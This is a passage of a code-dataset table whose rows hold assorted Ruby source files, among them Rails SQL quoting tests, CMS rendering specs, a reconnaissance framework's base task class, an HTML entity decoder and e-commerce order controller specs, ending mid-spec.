hexsha
stringlengths 40
40
| size
int64 2
1.01M
| content
stringlengths 2
1.01M
| avg_line_length
float64 1.5
100
| max_line_length
int64 2
1k
| alphanum_fraction
float64 0.25
1
|
---|---|---|---|---|---|
ed10c220bc4363c4d6943abd3f7ffc3ae1663e7f
| 92 |
class RecipeCategory < ActiveRecord::Base
belongs_to :category
belongs_to :recipe
end
| 13.142857 | 41 | 0.782609 |
1c276aa7655e4d4584680dd99fbbb33c3be15cc9
| 4,814 |
require "cases/helper"
module ActiveRecord
module ConnectionAdapters
class QuotingTest < ActiveRecord::TestCase
def setup
@quoter = Class.new { include Quoting }.new
end
def test_quoted_true
assert_equal "'t'", @quoter.quoted_true
end
def test_quoted_false
assert_equal "'f'", @quoter.quoted_false
end
def test_quote_column_name
assert_equal "foo", @quoter.quote_column_name("foo")
end
def test_quote_table_name
assert_equal "foo", @quoter.quote_table_name("foo")
end
def test_quote_table_name_calls_quote_column_name
@quoter.extend(Module.new {
def quote_column_name(string)
"lol"
end
})
assert_equal "lol", @quoter.quote_table_name("foo")
end
def test_quote_string
assert_equal "''", @quoter.quote_string("'")
assert_equal "\\\\", @quoter.quote_string("\\")
assert_equal "hi''i", @quoter.quote_string("hi'i")
assert_equal "hi\\\\i", @quoter.quote_string("hi\\i")
end
def test_quoted_date
t = Date.today
assert_equal t.to_s(:db), @quoter.quoted_date(t)
end
def test_quoted_time_utc
with_timezone_config default: :utc do
t = Time.now.change(usec: 0)
assert_equal t.getutc.to_s(:db), @quoter.quoted_date(t)
end
end
def test_quoted_time_local
with_timezone_config default: :local do
t = Time.now.change(usec: 0)
assert_equal t.getlocal.to_s(:db), @quoter.quoted_date(t)
end
end
def test_quoted_time_crazy
with_timezone_config default: :asdfasdf do
t = Time.now.change(usec: 0)
assert_equal t.getlocal.to_s(:db), @quoter.quoted_date(t)
end
end
def test_quoted_datetime_utc
with_timezone_config default: :utc do
t = Time.now.change(usec: 0).to_datetime
assert_equal t.getutc.to_s(:db), @quoter.quoted_date(t)
end
end
###
# DateTime doesn't define getlocal, so make sure it does nothing
def test_quoted_datetime_local
with_timezone_config default: :local do
t = Time.now.change(usec: 0).to_datetime
assert_equal t.to_s(:db), @quoter.quoted_date(t)
end
end
def test_quote_with_quoted_id
assert_equal 1, @quoter.quote(Struct.new(:quoted_id).new(1), nil)
end
def test_quote_nil
assert_equal "NULL", @quoter.quote(nil, nil)
end
def test_quote_true
assert_equal @quoter.quoted_true, @quoter.quote(true, nil)
end
def test_quote_false
assert_equal @quoter.quoted_false, @quoter.quote(false, nil)
end
def test_quote_float
float = 1.2
assert_equal float.to_s, @quoter.quote(float, nil)
end
def test_quote_integer
integer = 1
assert_equal integer.to_s, @quoter.quote(integer, nil)
end
def test_quote_bignum
bignum = 1 << 100
assert_equal bignum.to_s, @quoter.quote(bignum, nil)
end
def test_quote_bigdecimal
bigdec = BigDecimal.new((1 << 100).to_s)
assert_equal bigdec.to_s("F"), @quoter.quote(bigdec, nil)
end
def test_dates_and_times
@quoter.extend(Module.new { def quoted_date(value) "lol" end })
assert_equal "'lol'", @quoter.quote(Date.today, nil)
assert_equal "'lol'", @quoter.quote(Time.now, nil)
assert_equal "'lol'", @quoter.quote(DateTime.now, nil)
end
def test_crazy_object
crazy = Object.new
e = assert_raises(TypeError) do
@quoter.quote(crazy, nil)
end
assert_equal "can't quote Object", e.message
end
def test_quote_string_no_column
assert_equal "'lo\\\\l'", @quoter.quote('lo\l', nil)
end
def test_quote_as_mb_chars_no_column
string = ActiveSupport::Multibyte::Chars.new('lo\l')
assert_equal "'lo\\\\l'", @quoter.quote(string, nil)
end
def test_string_with_crazy_column
assert_equal "'lo\\\\l'", @quoter.quote('lo\l')
end
def test_quote_duration
assert_equal "1800", @quoter.quote(30.minutes)
end
end
class QuoteBooleanTest < ActiveRecord::TestCase
def setup
@connection = ActiveRecord::Base.connection
end
def test_quote_returns_frozen_string
assert_predicate @connection.quote(true), :frozen?
assert_predicate @connection.quote(false), :frozen?
end
def test_type_cast_returns_frozen_value
assert_predicate @connection.type_cast(true), :frozen?
assert_predicate @connection.type_cast(false), :frozen?
end
end
end
end
| 28.317647 | 73 | 0.624429 |
f71eeddf11880b5debc42f887f8e6f4300f60fb1
| 1,498 |
# frozen_string_literal: true
require 'rails_helper'
RSpec.describe Cocina::ToFedora::Descriptive::Subject do
subject(:xml) { writer.to_xml }
let(:writer) do
Nokogiri::XML::Builder.new do |xml|
xml.mods('xmlns' => 'http://www.loc.gov/mods/v3',
'xmlns:xsi' => 'http://www.w3.org/2001/XMLSchema-instance',
'version' => '3.6',
'xsi:schemaLocation' => 'http://www.loc.gov/mods/v3 http://www.loc.gov/standards/mods/v3/mods-3-6.xsd') do
described_class.write(xml: xml, subjects: subjects, id_generator: Cocina::ToFedora::Descriptive::IdGenerator.new)
end
end
end
context 'when it has a hierarchical geographic subject missing some hierarchies' do
let(:subjects) do
[
Cocina::Models::DescriptiveValue.new(
structuredValue: [
{
value: 'Africa',
type: 'continent'
}
],
type: 'place'
)
]
end
it 'builds the xml' do
expect(xml).to be_equivalent_to <<~XML
<mods xmlns:xsi="http://www.w3.org/2001/XMLSchema-instance"
xmlns="http://www.loc.gov/mods/v3" version="3.6"
xsi:schemaLocation="http://www.loc.gov/mods/v3 http://www.loc.gov/standards/mods/v3/mods-3-6.xsd">
<subject>
<hierarchicalGeographic>
<continent>Africa</continent>
</hierarchicalGeographic>
</subject>
</mods>
XML
end
end
end
| 30.571429 | 121 | 0.579439 |
61f42c78a1de80306ce8f15c6552b5311b3fc298
| 2,139 |
#!/bin/ruby
require 'strscan'
if ARGV.size < 1
puts "USAGE: verilog.rb <filenames>"
exit 1
end
scanner = StringScanner.new("")
inmod = false
modname = nil
inputs = []
outputs = []
linen = 0
counter = 0;
print "\{\n"
puts "\"cells\": \[\n"
tmp = ARGV
while file = ARGV.shift
File.open(file).each_line do |line|
scanner << line
linen += 1
scanner.skip(/\s*/)
scanner.skip(/\/\*[\n\s\w\W\*]*\*\//)
scanner.skip(/\/\/[\w\W]*\n/)
scanner.skip(/`[\w\W]*\n/)
if(!inmod)
if(scanner.skip(/module\s*/))
#puts "found module"
inmod = true
end
end
if(inmod)
scanner.skip(/[\s\n]*/)
if(modname == nil)
if(scanner.skip(/\\?(\$?\w+)/))
modname = scanner[1]
else
next
end
end
if(scanner.skip(/\s*\(/))
while(scanner.skip(/\s*(\w+)\s*,\s*/))
end
scanner.skip(/\w+\s*\)\s*;[\s\n]*/)
end
if(scanner.skip(/\s*input\s+/))
scanner.skip(/\[\d+:\d+\]/)
while(scanner.skip(/\s*(\w+)\s*[,;]?\s*/))
inputs << scanner[1]
break if(scanner.rest.match(/\s*output\s*/))
end
scanner.skip(/\s*;\s*/)
end
if(scanner.skip(/\s*output\s+/))
scanner.skip(/reg\s+/)
scanner.skip(/\[\d+:\d+\]/)
while(scanner.skip(/\s*(\w+)\s*[,;]?\s*/))
outputs << scanner[1]
break if(scanner.rest.match(/\s*input\s*/))
end
scanner.skip(/\s*;\s*/)
end
#ignore everything else
if(scanner.skip_until(/endmodule/))
if(counter > 0)
print(",\n")
end
#puts "- cell: #{modname}"
puts "\{ "
puts "\"cell\": \"#{modname}\","
print "\"inps\": \["
print inputs.map { |a| "\"#{a}\""}.join(",\t")
puts "\],"
print "\"outs\": \["
print outputs.map { |a| "\"#{a}\""}.join(",\t")
puts "\]"
print "\}"
inmod = false
modname = nil
inputs.clear
outputs.clear
counter += 1
end
end
end
end
print "\n\]\n"
print "\}"
| 19.445455 | 56 | 0.451145 |
f704bfd2cc55b6efbcc603f3a01b8371a9a87811
| 7,104 |
require 'spec_helper'
require 'ostruct'
describe 'Locomotive rendering system' do
before(:each) do
@controller = Locomotive::TestController.new
Site.any_instance.stubs(:create_default_pages!).returns(true)
@site = Factory.build(:site)
Site.stubs(:find).returns(@site)
@controller.current_site = @site
@page = Factory.build(:page, :site => nil, :published => true)
end
context '#liquid_context' do
it 'includes the current date and time' do
@controller.instance_variable_set(:@page, @page)
@controller.stubs(:flash).returns({})
@controller.stubs(:params).returns({})
@controller.stubs(:request).returns(OpenStruct.new(:url => '/'))
context = @controller.send(:locomotive_context)
context['now'].should_not be_blank
context['today'].should_not be_blank
end
end
context 'setting the response' do
before(:each) do
@controller.instance_variable_set(:@page, @page)
@controller.send(:prepare_and_set_response, 'Hello world !')
end
it 'sets the content type to html' do
@controller.response.headers['Content-Type'].should == 'text/html; charset=utf-8'
end
it 'sets the status to 200 OK' do
@controller.status.should == :ok
end
it 'displays the output' do
@controller.output.should == 'Hello world !'
end
it 'does not set the cache' do
@controller.response.headers['Cache-Control'].should be_nil
end
it 'sets the cache by simply using etag' do
@page.cache_strategy = 'simple'
@page.stubs(:updated_at).returns(Time.now)
@controller.send(:prepare_and_set_response, 'Hello world !')
@controller.response.to_a # force to build headers
@controller.response.headers['Cache-Control'].should == 'public'
end
it 'sets the cache for Varnish' do
@page.cache_strategy = '3600'
@page.stubs(:updated_at).returns(Time.now)
@controller.send(:prepare_and_set_response, 'Hello world !')
@controller.response.to_a # force to build headers
@controller.response.headers['Cache-Control'].should == 'max-age=3600, public'
end
it 'sets the status to 404 not found when no page is found' do
@page.stubs(:not_found?).returns(true)
@controller.send(:prepare_and_set_response, 'Hello world !')
@controller.status.should == :not_found
end
end
context 'when retrieving page' do
it 'should retrieve the index page /' do
@controller.request.fullpath = '/'
@controller.current_site.pages.expects(:any_in).with({ :fullpath => %w{index} }).returns([@page])
@controller.send(:locomotive_page).should_not be_nil
end
it 'should also retrieve the index page (index.html)' do
@controller.request.fullpath = '/index.html'
@controller.current_site.pages.expects(:any_in).with({ :fullpath => %w{index} }).returns([@page])
@controller.send(:locomotive_page).should_not be_nil
end
it 'should retrieve it based on the full path' do
@controller.request.fullpath = '/about_us/team.html'
@controller.current_site.pages.expects(:any_in).with({ :fullpath => %w{about_us/team about_us/content_type_template} }).returns([@page])
@controller.send(:locomotive_page).should_not be_nil
end
it 'does not include the query string' do
@controller.request.fullpath = '/about_us/team.html?some=params&we=use'
@controller.current_site.pages.expects(:any_in).with({ :fullpath => %w{about_us/team about_us/content_type_template} }).returns([@page])
@controller.send(:locomotive_page).should_not be_nil
end
it 'should return the 404 page if the page does not exist' do
@controller.request.fullpath = '/contact'
(klass = Page).expects(:published).returns([true])
@controller.current_site.pages.expects(:not_found).returns(klass)
@controller.send(:locomotive_page).should be_true
end
context 'redirect' do
before(:each) do
@page.redirect = true
@page.redirect_url = 'http://www.example.com/'
@controller.request.fullpath = '/contact'
@controller.current_site.pages.expects(:any_in).with({ :fullpath => %w{contact content_type_template} }).returns([@page])
end
it 'redirects to the redirect_url' do
@controller.expects(:redirect_to).with('http://www.example.com/').returns(true)
@controller.send(:render_locomotive_page)
end
end
context 'templatized page' do
before(:each) do
@content_type = Factory.build(:content_type, :site => nil)
@content = @content_type.contents.build(:_visible => true)
@page.templatized = true
@page.content_type = @content_type
@controller.request.fullpath = '/projects/edeneo.html'
@controller.current_site.pages.expects(:any_in).with({ :fullpath => %w{projects/edeneo projects/content_type_template} }).returns([@page])
end
it 'sets the content_instance variable' do
@content_type.contents.stubs(:where).returns([@content])
@controller.send(:locomotive_page).should_not be_nil
@controller.instance_variable_get(:@content_instance).should == @content
end
it 'returns the 404 page if the instance does not exist' do
@content_type.contents.stubs(:where).returns([])
(klass = Page).expects(:published).returns([true])
@controller.current_site.pages.expects(:not_found).returns(klass)
@controller.send(:locomotive_page).should be_true
@controller.instance_variable_get(:@content_instance).should be_nil
end
it 'returns the 404 page if the instance is not visible' do
@content._visible = false
@content_type.contents.stubs(:where).returns([@content])
(klass = Page).expects(:published).returns([true])
@controller.current_site.pages.expects(:not_found).returns(klass)
@controller.send(:locomotive_page).should be_true
end
end
context 'non published page' do
before(:each) do
@page.published = false
@controller.current_admin = nil
end
it 'should return the 404 page if the page has not been published yet' do
@controller.request.fullpath = '/contact'
@controller.current_site.pages.expects(:any_in).with({ :fullpath => %w{contact content_type_template} }).returns([@page])
(klass = Page).expects(:published).returns([true])
@controller.current_site.pages.expects(:not_found).returns(klass)
@controller.send(:locomotive_page).should be_true
end
it 'should not return the 404 page if the page has not been published yet and admin is logged in' do
@controller.current_admin = true
@controller.request.fullpath = '/contact'
@controller.current_site.pages.expects(:any_in).with({ :fullpath => %w{contact content_type_template} }).returns([@page])
@controller.send(:locomotive_page).should == @page
end
end
end
after(:all) do
ENV['APP_TLD'] = nil
Locomotive.configure_for_test(true)
end
end
| 37 | 146 | 0.675535 |
bb423ec1e9e8cf6803f37b6f72a3664411b5d771
| 1,854 |
require 'daimyo'
module Daimyo
class Export
def initialize
@wiki ||= Daimyo::Client.new
end
def run(project_id, wiki_id = nil)
ids = select_wiki_ids(project_id)
pb = ProgressBar.create(:format => "%a %b\u{15E7}%i %p%% %t",
:progress_mark => ' ',
:remainder_mark => "\u{FF65}",
:starting_at => 10,
:length => 50)
ids.each do |id|
wiki = @wiki.export(id).body
name = wiki.name
content = wiki.content
write_file(project_id, id, name, content)
pb.increment
sleep 0.1
end
pb.finish
end
private
def select_wiki_ids(project_id)
@wiki.list(project_id).body.map { |w| w.id }
end
def write_file(project_id, id, name, content)
path = define_directory_path(project_id, name)
create_wiki_directory(path)
filename = id.to_s + '_' + define_file_path(name) + '.md'
file_path = path + '/' + filename
File.open(file_path, 'w') do |f|
f.puts(content.gsub("\r\n", "\n"))
end
original_file_path = path + '/' + '.' + filename
File.open(original_file_path, 'w') do |f|
f.puts(content.gsub("\r\n", "\n"))
end
end
def create_wiki_directory(path)
FileUtils.mkdir_p(path) unless FileTest.exist?(path)
path
end
def define_directory_path(project_id, name)
space = @wiki.instance_variable_get(:@client).instance_variable_get(:@space_id)
return space + '/' + project_id unless name.include?('/')
space + '/' + project_id + '/' + File.dirname(name) # 最後の 1 要素をファイル名とする
end
def define_file_path(name)
return name unless name.include?('/')
File.basename(name) # 最後の 1 要素をファイル名とする
end
end
end
| 28.090909 | 85 | 0.565804 |
9197f2b1cc61b256e0c34b99d295d90d807eea8e
| 835 |
if RUBY_PLATFORM =~ /java/
class java::security::cert::X509Certificate
java_import 'org.apache.commons.codec.binary.Hex'
java_import 'java.security.MessageDigest'
def md5_fingerprint
digest("md5")
end
def sha1_fingerprint
digest("sha1")
end
def serial_number_string
self.serial_number.to_i.to_s(16).upcase
end
def issued_on
to_utc(self.not_before)
end
def expires_on
to_utc(self.not_after)
end
private
def digest(algorithm)
hex_bytes = Hex.encodeHex(MessageDigest.getInstance(algorithm).digest(self.encoded))
colon_separated(java.lang.String.new(hex_bytes).to_s)
end
def colon_separated(string)
string.upcase.scan(/.{2}/).join(':')
end
def to_utc(date)
Time.parse(date.to_s).utc
end
end
end
| 19.418605 | 90 | 0.667066 |
6aa95958a8e76e1a03b0e76ea2e9cb73afbf35e0
| 9,020 |
module Intrigue
module Task
class BaseTask
# TODO - verify and re-enable these.. just need to make sure
# there are no namespace collisions
include Intrigue::Task::Browser
include Intrigue::Task::Data
include Intrigue::Task::Dns
include Intrigue::Task::Enrich
include Intrigue::Task::Generic
include Intrigue::Task::Helper
include Intrigue::Task::Parse
include Intrigue::Task::Product
include Intrigue::Task::Regex
include Intrigue::Task::Scanner
include Intrigue::Task::Web
include Sidekiq::Worker
sidekiq_options :queue => "task", :backtrace => true
def self.inherited(base)
TaskFactory.register(base)
end
def perform(task_result_id)
# Get the Task Result
@task_result = Intrigue::Model::TaskResult.first(:id => task_result_id)
raise "Unable to find task result: #{task_result_id}. Bailing." unless @task_result
# Handle cancellation
if @task_result.cancelled
_log_error "FATAL!!! I was cancelled, returning without running!"
return
end
begin
@entity = @task_result.base_entity
@project = @task_result.project
options = @task_result.options
# we must have these things to continue (if they're missing, fail)
unless @task_result && @project && @entity
_log_error "Unable to find task_result. Bailing." unless @task_result
_log_error "Unable to find project. Bailing." unless @project
_log_error "Unable to find entity. Bailing." unless @entity
return nil
end
# We need a flag to skip the actual setup, run, cleanup of the task if
# the caller gave us something broken. We still want to get the final
# task result back to the caller though (so no raise). Assume it's good,
# and check input along the way.
broken_input_flag = false
# Do a little logging. Do it for the kids!
_log "Id: #{task_result_id}"
_log "Entity: #{@entity.type_string}##{@entity.name}"
###################
# Sanity Checking #
###################
allowed_types = self.class.metadata[:allowed_types]
# Check to make sure this task can receive an entity of this type and if
unless allowed_types.include?(@entity.type_string) || allowed_types.include?("*")
_log_error "Unable to call #{self.class.metadata[:name]} on entity: #{@entity}"
broken_input_flag = true
end
###########################
# Setup the task result #
###########################
@task_result.task_name = self.class.metadata[:name]
@task_result.timestamp_start = Time.now.getutc
#####################################
# Perform the setup -> run workflow #
#####################################
unless broken_input_flag
# Setup creates the following objects:
# @user_options - a hash of task options
# @task_result - the final result to be passed back to the caller
_log "Setting up the task!"
if setup(task_result_id, @entity, options)
_log "Running the task!"
@task_result.save # Save the task
run # Run the task, which will update @task_result
_log "Run complete. Ship it!"
else
_log_error "Setup failed, bailing out!"
end
end
scan_result = @task_result.scan_result
if scan_result
scan_result.decrement_task_count
puts "#{scan_result.incomplete_task_count} tasks left in this scan"
#################
# Call Handlers #
#################
if scan_result.handlers.count > 0
# Check our incomplete task count on the scan to see if this is the last one
if scan_result.incomplete_task_count <= 0
_log "Last task standing, let's handle it!"
scan_result.handle_attached
# let's mark it complete if there's nothing else to do here.
scan_result.handlers_complete = true
scan_result.complete = true
scan_result.save
end
end
end
#### Task Result Handlers
if @task_result.handlers.count > 0
@task_result.handle_attached
@task_result.handlers_complete = true
end
ensure # Mark it complete and save it
_log "Cleaning up!"
@task_result.timestamp_end = Time.now.getutc
@task_result.complete = true
@task_result.logger.save
@task_result.save
end
end
#########################################################
# These methods are used to perform work in several steps.
# they should be overridden by individual tasks, but note that
# individual tasks must always call super()
#
def setup(task_id, entity, user_options)
# We need to parse options and make sure we're
# allowed to accept these options. Compare to allowed_options.
#
# allowed options is formatted:
# [{:name => "count", :type => "Integer", :default => 1 }, ... ]
#
# user_options is formatted:
# [{"name" => "option name", "value" => "value"}, ...]
allowed_options = self.class.metadata[:allowed_options]
@user_options = []
if user_options
#_log "Got user options list: #{user_options}"
# for each of the user-supplied options
user_options.each do |user_option| # should be an array of hashes
# go through the allowed options
allowed_options.each do |allowed_option|
# If we have a match of an allowed option & one of the user-specified options
if "#{user_option["name"]}" == "#{allowed_option[:name]}"
### Match the user option against its specified regex
if allowed_option[:regex] == "integer"
#_log "Regex should match an integer"
regex = _get_regex(:integer)
elsif allowed_option[:regex] == "boolean"
#_log "Regex should match a boolean"
regex = _get_regex(:boolean)
elsif allowed_option[:regex] == "alpha_numeric"
#_log "Regex should match an alpha-numeric string"
regex = _get_regex(:alpha_numeric)
elsif allowed_option[:regex] == "alpha_numeric_list"
#_log "Regex should match an alpha-numeric list"
regex = _get_regex(:alpha_numeric_list)
elsif allowed_option[:regex] == "numeric_list"
#_log "Regex should match an alpha-numeric list"
regex = _get_regex(:numeric_list)
elsif allowed_option[:regex] == "filename"
#_log "Regex should match a filename"
regex = _get_regex(:filename)
elsif allowed_option[:regex] == "ip_address"
#_log "Regex should match an IP Address"
regex = _get_regex(:ip_address)
else
_log_error "Unspecified regex for this option #{allowed_option[:name]}"
_log_error "Unable to continue, failing!"
return nil
end
# Run the regex
unless regex.match "#{user_option["value"]}"
_log_error "Regex didn't match"
_log_error "Option #{user_option["name"]} does not match regex: #{regex.to_s} (#{user_option["value"]})!"
_log_error "Regex didn't match, failing!"
return nil
end
###
### End Regex matching
###
# We have an allowed option, with the right kind of value
# ...Now set the correct type
# So things like core-cli are parsing data as strings,
# and are sending us all of our options as strings. Which sucks. We
# have to do the explicit conversion to the right type if we want things to go
# smoothly. I'm sure there's a better way to do this in ruby, but
# i'm equally sure don't know what it is. We'll fail the task if
# there's something we can't handle
if allowed_option[:regex] == "integer"
# convert to integer
#_log "Converting #{user_option["name"]} to an integer"
user_option["value"] = user_option["value"].to_i
elsif allowed_option[:regex] == "boolean"
# use our monkeypatched .to_bool method (see initializers)
#_log "Converting #{user_option["name"]} to a bool"
user_option["value"] = user_option["value"].to_bool if user_option["value"].kind_of? String
end
# Hurray, we can accept this value
@user_options << { allowed_option[:name] => user_option["value"] }
end
end
end
_log "Options: #{@user_options}"
else
_log "No User options"
end
true
end
# This method is overridden
def run
end
#
#########################################################
# Override this method if the task has external dependencies
def check_external_dependencies
true
end
end
end
end
| 34.826255 | 119 | 0.59612 |
79b8af1a397d632df9af1f2b5610183285ee0b15
| 183 |
require_relative "lib/chronal_calibration"
cc = ChronalCalibration.new
cc.load_file "input/01_input.txt"
puts "Part 1 - #{cc.calculate_frequency}"
puts "Part 2 - #{cc.reach_twice}"
| 22.875 | 42 | 0.765027 |
b9903bbe8e99927291c89037a6deee67dda57e52
| 1,153 |
class Lftp < Formula
desc "Sophisticated file transfer program"
homepage "https://lftp.yar.ru/"
url "https://lftp.yar.ru/ftp/lftp-4.8.4.tar.xz"
sha256 "4ebc271e9e5cea84a683375a0f7e91086e5dac90c5d51bb3f169f75386107a62"
bottle do
# sha256 "7758a9fae5106d3e7f43ae84f34ae0801b73430907afbc3526a6b49a4bccef88" => :mojave
sha256 "648f4e7d3b8f26659cc684b545d4d14ed0e070be7174ff072b69502917f30613" => :high_sierra
sha256 "3850131c9cc3047d8f041744c4245f6f3684093f3de2815fa8bc56ea1896c888" => :sierra
sha256 "080ba35e879de061f9c794bb3ee59f32259897395dd6b774471aed16a91279f8" => :el_capitan
end
depends_on "libidn"
depends_on "openssl"
depends_on "readline"
def install
system "./configure", "--disable-dependency-tracking",
"--prefix=#{prefix}",
"--with-openssl=#{Formula["openssl"].opt_prefix}",
"--with-readline=#{Formula["readline"].opt_prefix}",
"--with-libidn=#{Formula["libidn"].opt_prefix}"
system "make", "install"
end
test do
system "#{bin}/lftp", "-c", "open https://ftp.gnu.org/; ls"
end
end
| 37.193548 | 93 | 0.679965 |
e9e08b2debe43a0d0509b4f52ef1ef898d17214e
| 961 |
class HTMLEntities
class Decoder #:nodoc:
def initialize(flavor)
@flavor = flavor
@map = HTMLEntities::MAPPINGS[@flavor]
@entity_regexp = entity_regexp
end
def decode(source)
prepare(source).gsub(@entity_regexp){
if $1 && codepoint = @map[$1]
codepoint.chr(Encoding::UTF_8)
elsif $2
$2.to_i(10).chr(Encoding::UTF_8)
elsif $3
$3.to_i(16).chr(Encoding::UTF_8)
else
$&
end
}
end
private
def prepare(string) #:nodoc:
string.to_s.encode(Encoding::UTF_8)
end
def entity_regexp
key_lengths = @map.keys.map{ |k| k.length }
if @flavor == 'expanded'
entity_name_pattern = '(?:b\.)?[a-z][a-z0-9]'
else
entity_name_pattern = '[a-z][a-z0-9]'
end
/&(?:(#{entity_name_pattern}{#{key_lengths.min - 1},#{key_lengths.max - 1}})|#([0-9]{1,7})|#x([0-9a-f]{1,6}));/i
end
end
end
| 24.641026 | 118 | 0.547347 |
e9237b8c3fb2b2535083cbb7a3b72cbf131b0006
| 543 |
require 'rails_helper'
RSpec.describe 'PowerConverter' do
context 'slug' do
[
{ to_convert: 'Hello World', expected: 'hello-world' },
{ to_convert: 'HelloWorld', expected: 'hello-world' },
{ to_convert: '', expected: '' },
{ to_convert: nil, expected: '' }
].each do |scenario|
it "will convert #{scenario.fetch(:to_convert)} to #{scenario.fetch(:expected)}" do
expect(PowerConverter.convert(scenario.fetch(:to_convert), to: :slug)).to eq(scenario.fetch(:expected))
end
end
end
end
| 31.941176 | 111 | 0.633517 |
f8a35defcdb3743ee9d7c7e1873e4ba67aafec2d
| 1,021 |
class API
def self.categories
uri = URI.parse("https://opentdb.com/api_category.php")
resp = Net::HTTP.get(uri)
data = JSON.parse(resp)
categories = data[:trivia_categories]
categories.each do |category|
id = category[:id]
name = category[:name]
Category.new(id, name)
end
end
def self.question
uri = URI.parse("https://opentdb.com/api.php?amount=1&category=#{category.id}&type=boolean")
resp = Net::HTTP.get(uri)
data = JSON.parse(resp)
question = data[:results]
category = data[:results][0][:category]
type = data[:results][0][:type]
difficulty = data[:results][0][:difficulty]
question = data[:results][0][:question]
correct_answer = data[:results][0][:correct_answer]
incorrect_answer = data[:results][0][:incorrect_answers]
Question.new(category, type, difficulty, question, correct_answer, incorrect_answer)
end
end
| 37.814815 | 101 | 0.599412 |
d5c081b0efff7bdd87f5f666c4b3d983dd8b24c3
| 150 |
class SendEmailInProductionJob
include SuckerPunch::Job
def perform(mail)
WeightTracker::MailHelpers.send_mail_with_sendgrid(mail)
end
end
| 18.75 | 60 | 0.806667 |
bb9c5c824f572df189b4a2f0bed5622354d7bf46
| 996 |
namespace :db do
desc "Migrate schema to version 0 and back up again. WARNING: Destroys all data in Radiant tables."
task :remigrate => :environment do
require 'highline/import'
if ENV['OVERWRITE'].to_s.downcase == 'true' or
agree("This task will destroy any data in the database. Are you sure you want to \ncontinue? [yn] ")
# Migrate downward
ActiveRecord::Migrator.migrate("#{RADIANT_ROOT}/db/migrate/", 0)
# Migrate upward
Rake::Task["db:migrate"].invoke
# Dump the schema
Rake::Task["db:schema:dump"].invoke
else
say "Task cancelled."
exit
end
end
desc "Bootstrap your database for Radiant."
task :bootstrap => :remigrate do
require 'radiant/setup'
Radiant::Setup.bootstrap(
:admin_name => ENV['ADMIN_NAME'],
:admin_username => ENV['ADMIN_USERNAME'],
:admin_password => ENV['ADMIN_PASSWORD'],
:database_template => ENV['DATABASE_TEMPLATE']
)
end
end
| 30.181818 | 106 | 0.64257 |
e24ae09c9e56d9597efc7be40e08d77c3bb05cf3
| 1,077 |
module Brightbox
command [:config] do |cmd|
cmd.default_command :client_list
cmd.desc I18n.t("config.client_list.desc")
cmd.command [:client_list] do |c|
c.action do |global_options, _options, _args|
info "Using config file #{Brightbox.config.config_filename}"
clients = Brightbox.config.section_names.map do |cid|
c = Brightbox.config[cid]
calias = c["alias"] || cid
# Append a star for the configured default client
if Brightbox.config.default_client == cid && Brightbox.config.has_multiple_clients?
calias = "*#{calias}"
end
{
:alias => calias,
:client_id => c["client_id"] || Brightbox::EMBEDDED_APP_ID,
:secret => c["secret"] || Brightbox::EMBEDDED_APP_SECRET,
:api_url => c["api_url"],
:auth_url => c["auth_url"] || c["api_url"]
}
end
render_table clients, global_options.merge(:fields => [:alias, :client_id, :secret, :api_url, :auth_url])
end
end
end
end
| 29.916667 | 113 | 0.588672 |
4a4665069a7173265fd2028023a69092e14516a3
| 707 |
# frozen_string_literal: true
# GET {{ base_url }}/address/format/v1/{global_address_key}
module ExperianAddressValidation
module Operations
# Handles address formatting
class Format < Operation
FORMAT_HEADERS = {
"Add-Metadata": "true",
"Add-Components": "true"
}.freeze
private
def endpoint
"#{base_url}/address/format/v1/#{global_address_key}"
end
def global_address_key
options[:global_address_key]
end
def http_method
:get
end
def headers
option_headers = options.fetch(:headers, {})
DEFAULT_HEADERS.merge(**FORMAT_HEADERS, **option_headers)
end
end
end
end
| 20.794118 | 65 | 0.630835 |
01d78249263e1f58d5d9d55ab816a37b186c1428
| 669 |
require "rails_helper"
RSpec.describe Staff::ReportsController do
describe "#index" do
context "when logged in as a delivery partner" do
let(:organisation) { create(:delivery_partner_organisation) }
let(:user) { create(:delivery_partner_user, organisation: organisation) }
before do
allow(controller).to receive(:current_user).and_return(user)
allow(controller).to receive(:logged_in_using_omniauth?).and_return(true)
end
it "redirects to show the user's organisation's reports" do
expect(get(:index)).to redirect_to(organisation_reports_path(organisation_id: organisation.id))
end
end
end
end
| 33.45 | 103 | 0.718984 |
61c9e3d412b95d4337e69d6db8bbba1f718bc12e
| 10,824 |
describe Comable::OrdersController do
render_views
let(:product) { create(:product, stocks: [stock]) }
let(:stock) { create(:stock, :stocked) }
let(:address_attributes) { attributes_for(:address) }
let(:current_order) { controller.current_order }
describe "GET 'signin'" do
before { get :signin }
context 'when empty cart' do
its(:response) { is_expected.to redirect_to(:cart) }
it 'has flash messages' do
expect(flash[:alert]).to eq Comable.t('carts.empty')
end
end
end
# TODO: Refactaring
# - subject { response }
# - remove 'its'
# - 'with state' => context
shared_examples 'checkout' do
let!(:payment_method) { create(:payment_method) }
let!(:shipment_method) { create(:shipment_method) }
let(:product) { create(:product, stocks: [stock]) }
let(:stock) { create(:stock, :stocked) }
let(:address_attributes) { attributes_for(:address) }
let(:current_order) { controller.current_order }
before { allow(controller).to receive(:current_comable_user).and_return(user) }
before { user.add_cart_item(product) }
describe "GET 'signin'" do
before { skip 'Unnecessary test case' if user.signed_in? }
before { get :signin }
its(:response) { is_expected.to render_template(:signin) }
its(:response) { is_expected.not_to be_redirect }
it 'cart has any items' do
expect(user.cart.count).to be_nonzero
end
end
describe "PUT 'guest'" do
let(:order_attributes) { { email: '[email protected]' } }
before { skip 'Unnecessary test case' if user.signed_in? }
before { put :guest, order: order_attributes }
its(:response) { is_expected.to redirect_to(controller.comable.next_order_path(state: :orderer)) }
context 'when email is empty' do
let(:order_attributes) { { email: nil } }
its(:response) { is_expected.to render_template(:signin) }
its(:response) { is_expected.not_to be_redirect }
end
end
describe "GET 'edit' with state 'orderer'" do
let(:order_attributes) { attributes_for(:order, :for_orderer) }
before { current_order.update_attributes(order_attributes) }
before { get :edit, state: :orderer }
its(:response) { is_expected.to render_template(:orderer) }
its(:response) { is_expected.not_to be_redirect }
context 'when not exist email' do
let(:order_attributes) { attributes_for(:order, :for_orderer, email: nil) }
it { is_expected.to redirect_to(controller.comable.signin_order_path) }
end
end
describe "PUT 'update' with state 'orderer'" do
let(:order_attributes) { attributes_for(:order, :for_orderer) }
before { current_order.update_attributes(order_attributes) }
context 'when not exist bill address' do
before { put :update, state: :orderer }
its(:response) { is_expected.to render_template(:orderer) }
its(:response) { is_expected.not_to be_redirect }
it 'has assigned @order with errors' do
expect(assigns(:order).errors.any?).to be true
